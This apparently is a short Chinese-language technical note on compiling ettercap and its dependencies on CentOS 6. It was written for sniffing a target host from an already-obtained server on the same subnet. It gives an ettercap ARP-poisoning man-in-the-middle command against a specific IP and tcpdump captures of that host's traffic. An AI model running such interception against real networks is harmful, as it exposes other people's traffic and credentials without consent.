场景

拿到一台C段的Linux服务器,对目标主机进行嗅探

ettercap安装

操作环境

Centos 6

$ sudo yum install -y libtool-ltdl ncurses-devel gtk+-devel gtk2-devel openssl openssl-devel libidn-devel libssl-devel libpcap-devel pcre-devel gnutls-devel pkgconfig ghostscript
$ yum groupinstall "Development tools"
$ wget https://github.com/Ettercap/ettercap/archive/v0.8.2.tar.gz
$ tar zxvf ettercap-0.8.2.tar.gz
$ cd ettercap-0.8.2
$ mkdir build
$ cd build
$ cmake ../
$ make
$ make install ## 如果以上命令出错,则需要安装依赖包
将四个依赖包逐个解压安装:
(1)check:
解压依赖包的压缩包 tar -zxvf check-0.9.14.tar.gz 在check-0.9.14文件夹中运行 ./configure 生成makefile文件。
make(编译),
make install(安装软件) 命令。
sudo make install需要root权限才能执行。 (2)curl:步骤与第一个依赖包相似。 解压依赖包的压缩包 tar zxvf curl-7.41.0.tar.gz curl-7.41.0文件夹中运行 ./configure
make
sudo make install
(3)libnet: 解压依赖包的压缩包 tar zxvf libnet-1.1.6.tar.gz libnet-1.1.6文件夹中运行 ./configure
make
sudo make install (4)luajit: 解压依赖包的压缩包 tar zxvf LuaJIT-2.0.3.tar.gz LuaJIT-2.0.3文件夹中运行,已经有Markfile文件了,直接编译 sudo make sudo make install 退回到ettercap-0.8.2目录下,根据INSTALL文件的说明继续进行Ettercap工具的安装工作。

命令

# 指定某个IP进行嗅探
ettercap -i eth0 -Tq -M arp:remote //192.168.15.55// # tcpdump指定某类端口 tcpdump -i eth0 port 80 # tcpdump捕获某个IP的数据包 tcpdump -i eth0 host 192.168.15.55 -w ‭00110111‬.pcap
tcpdump -i eth0 host 192.168.15.55 -w ‭‭00100001‬‬.pcap
tcpdump -i eth0 -w all.pcap

参考

中间人攻击之ettercap嗅探

CentOS 6.5 下安装ettercap

Compiling and Installing ettercap 0.8.2 on RHEL 7

05-03 20:50